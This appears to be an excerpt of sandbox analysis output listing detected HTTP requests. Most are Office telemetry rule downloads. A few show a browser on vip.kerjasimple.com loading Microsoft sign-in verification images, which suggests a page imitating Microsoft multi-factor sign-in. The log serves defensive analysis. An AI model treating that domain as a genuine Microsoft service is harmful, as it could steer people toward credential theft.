      Source: global trafficHTTP traffic detected: GET /rules/rule120633v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
      Source: global trafficHTTP traffic detected: GET /rules/rule120632v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
      Source: global trafficHTTP traffic detected: GET /rules/rule120629v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
      Source: global trafficHTTP traffic detected: GET /rules/rule120630v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
      Source: global trafficHTTP traffic detected: GET /rules/rule120631v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
      Source: global trafficHTTP traffic detected: GET /shared/1.0/content/images/picker_verify_code_b41922ebdaebec16b19999fc6054a15a.svg HTTP/1.1Host: aadcdn.msftauth.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://vip.kerjasimple.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
      Source: global trafficHTTP traffic detected: GET /favicon.ico HTTP/1.1Host: vip.kerjasimple.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
      Source: global trafficHTTP traffic detected: GET /rules/rule120634v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
      Source: global trafficHTTP traffic detected: GET /rules/rule120635v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
      Source: global trafficHTTP traffic detected: GET /rules/rule120638v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
      Source: global trafficHTTP traffic detected: GET /rules/rule120637v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
      Source: global trafficHTTP traffic detected: GET /shared/1.0/content/images/picker_verify_fluent_authenticator_59892f1e05e3adf9fd2f71b42d92a27f.svg HTTP/1.1Host: aadcdn.msauth.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
      Source: global trafficHTTP traffic detected: GET /shared/1.0/content/images/picker_verify_sms_12b7d768ba76f2e782cc74e328171091.svg HTTP/1.1Host: aadcdn.msauth.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
      Source: global trafficHTTP traffic detected: GET /rules/rule120636v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
      Source: global trafficHTTP traffic detected: GET /shared/1.0/content/images/picker_verify_code_b41922ebdaebec16b19999fc6054a15a.svg HTTP/1.1Host: aadcdn.msftauth.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
      Source: global trafficHTTP traffic detected: GET /rules/rule120639v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
      Source: global trafficHTTP traffic detected: GET /rules/rule120640v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
      Source: global trafficHTTP traffic detected: GET /rules/rule120641v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
      Source: global trafficHTTP traffic detected: GET /rules/rule120642v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
      Source: global trafficHTTP traffic detected: GET /rules/rule120643v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
      Source: global trafficHTTP traffic detected: GET /rules/rule120644v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
      Source: global trafficHTTP traffic detected: GET /rules/rule120645v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
      Source: global trafficHTTP traffic detected: GET /rules/rule120646v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
      Source: global trafficHTTP traffic detected: GET /rules/rule120647v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
      Source: global trafficHTTP traffic detected: GET /rules/rule120648v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
      Source: global trafficHTTP traffic detected: GET /rules/rule120649v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
      Source: global trafficHTTP traffic detected: GET /rules/rule120651v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
      Source: global trafficHTTP traffic detected: GET /rules/rule120652v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
      Source: global trafficHTTP traffic detected: GET /rules/rule120650v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
      Source: global trafficHTTP traffic detected: GET /rules/rule120653v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
      Source: global trafficHTTP traffic detected: GET /rules/rule120654v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
      Source: global trafficHTTP traffic detected: GET /rules/rule120655v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
      Source: global trafficHTTP traffic detected: GET /rules/rule120656v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
      Source: global trafficHTTP traffic detected: GET /rules/rule120657v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
      Source: global trafficHTTP traffic detected: GET /rules/rule120658v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
      Source: global trafficHTTP traffic detected: GET /rules/rule120659v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
      Source: global trafficHTTP traffic detected: GET /rules/rule120660v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
      Source: global trafficHTTP traffic detected: GET /rules/rule120661v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
      Source: global trafficHTTP traffic detected: GET /rules/rule120662v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
      Source: global trafficHTTP traffic detected: GET /rules/rule120663v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
      Source: global trafficHTTP traffic detected: GET /rules/rule120664v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
      Source: global trafficHTTP traffic detected: GET /rules/rule120665v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
      Source: global trafficHTTP traffic detected: GET /rules/rule120666v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
      Source: global trafficHTTP traffic detected: GET /rules/rule120667v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
      Source: global trafficHTTP traffic detected: GET /rules/rule120668v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
      Source: global trafficHTTP traffic detected: GET /rules/rule120669v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
      Source: global trafficHTTP traffic detected: GET /rules/rule120670v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
      Source: global trafficHTTP traffic detected: GET /rules/rule120671v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
      Source: global trafficHTTP traffic detected: GET /rules/rule120673v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
      Source: global trafficHTTP traffic detected: GET /rules/rule120674v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
      Source: global trafficHTTP traffic detected: GET /rules/rule120672v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
      Source: global trafficHTTP traffic detected: GET /rules/rule120675v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
      Source: global trafficHTTP traffic detected: GET /rules/rule120676v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
      Source: global trafficHTTP traffic detected: GET /rules/rule120677v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
      Source: global trafficHTTP traffic detected: GET /rules/rule120678v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
      Source: global trafficHTTP traffic detected: GET /rules/rule120680v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
      Source: global trafficHTTP traffic detected: GET /rules/rule120679v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
      Source: global trafficHTTP traffic detected: GET /rules/rule120682v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
      Source: global trafficHTTP traffic detected: GET /rules/rule120681v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
      Source: global trafficHTTP traffic detected: GET /rules/rule120602v10s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
      Source: global trafficHTTP traffic detected: GET /rules/rule120601v3s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
      Source: global trafficHTTP traffic detected: GET /rules/rule701201v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
      Source: global trafficHTTP traffic detected: GET /rules/rule224901v11s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
      Source: global trafficHTTP traffic detected: GET /rules/rule700201v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
      Source: global trafficHTTP traffic detected: GET /rules/rule701200v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
      Source: global trafficHTTP traffic detected: GET /rules/rule700200v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
      Source: global trafficHTTP traffic detected: GET /rules/rule702350v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
      Source: global trafficHTTP traffic detected: GET /rules/rule702351v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
      Source: global trafficHTTP traffic detected: GET /rules/rule701251v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
      Source: global trafficHTTP traffic detected: GET /rules/rule701250v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
      Source: global trafficHTTP traffic detected: GET /rules/rule700051v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
      Source: global trafficHTTP traffic detected: GET /rules/rule702951v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
      Source: global trafficHTTP traffic detected: GET /rules/rule700050v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
      Source: global trafficHTTP traffic detected: GET /rules/rule702950v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
      Source: global trafficHTTP traffic detected: GET /rules/rule701151v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
      Source: global trafficHTTP traffic detected: GET /rules/rule701150v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
      Source: global trafficHTTP traffic detected: GET /rules/rule702201v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
      Source: global trafficHTTP traffic detected: GET /rules/rule702200v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
      Source: global trafficHTTP traffic detected: GET /rules/rule700401v2s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
      Source: global trafficHTTP traffic detected: GET /rules/rule700400v2s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
      Source: global trafficHTTP traffic detected: GET /rules/rule700350v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
      Source: global trafficHTTP traffic detected: GET /rules/rule703901v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
      Source: global trafficHTTP traffic detected: GET /rules/rule703900v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
      Source: global trafficHTTP traffic detected: GET /rules/rule700351v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
      Source: global trafficHTTP traffic detected: GET /rules/rule701501v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
      Source: global trafficHTTP traffic detected: GET /rules/rule701500v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
      Source: global trafficHTTP traffic detected: GET /rules/rule702800v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
      Source: global trafficHTTP traffic detected: GET /rules/rule702801v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
      Source: global trafficHTTP traffic detected: GET /rules/rule703351v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
      Source: global trafficHTTP traffic detected: GET /rules/rule703350v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
      Source: global trafficHTTP traffic detected: GET /rules/rule703501v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
      Source: global trafficHTTP traffic detected: GET /rules/rule703500v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
      Source: global trafficHTTP traffic detected: GET /rules/rule701801v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
      Source: global trafficHTTP traffic detected: GET /rules/rule701800v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
      Source: global trafficHTTP traffic detected: GET /rules/rule701051v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
      Source: global trafficHTTP traffic detected: GET /rules/rule701050v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
      Source: global trafficHTTP traffic detected: GET /rules/rule702751v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
      Source: global trafficHTTP traffic detected: GET /rules/rule702750v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
      Source: global trafficHTTP traffic detected: GET /rules/rule702301v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
      Source: global trafficHTTP traffic detected: GET /rules/rule702300v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
      Source: global trafficHTTP traffic detected: GET /rules/rule703400v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
      Source: global trafficHTTP traffic detected: GET /rules/rule702501v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
      Source: global trafficHTTP traffic detected: GET /rules/rule703401v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
      Source: global trafficHTTP traffic detected: GET /rules/rule702500v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
      Source: global trafficHTTP traffic detected: GET /rules/rule700501v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
      Source: global trafficHTTP traffic detected: GET /rules/rule700500v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
      Source: global trafficHTTP traffic detected: GET /rules/rule702551v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
      Source: global trafficHTTP traffic detected: GET /rules/rule701351v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
      Source: global trafficHTTP traffic detected: GET /rules/rule701350v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
      Source: global trafficHTTP traffic detected: GET /rules/rule702150v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
      Source: global trafficHTTP traffic detected: GET /rules/rule703000v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
      Source: global trafficHTTP traffic detected: GET /rules/rule700751v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
      Source: global trafficHTTP traffic detected: GET /rules/rule702151v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
      Source: global trafficHTTP traffic detected: GET /rules/rule700750v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
      Source: global trafficHTTP traffic detected: GET /rules/rule700151v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
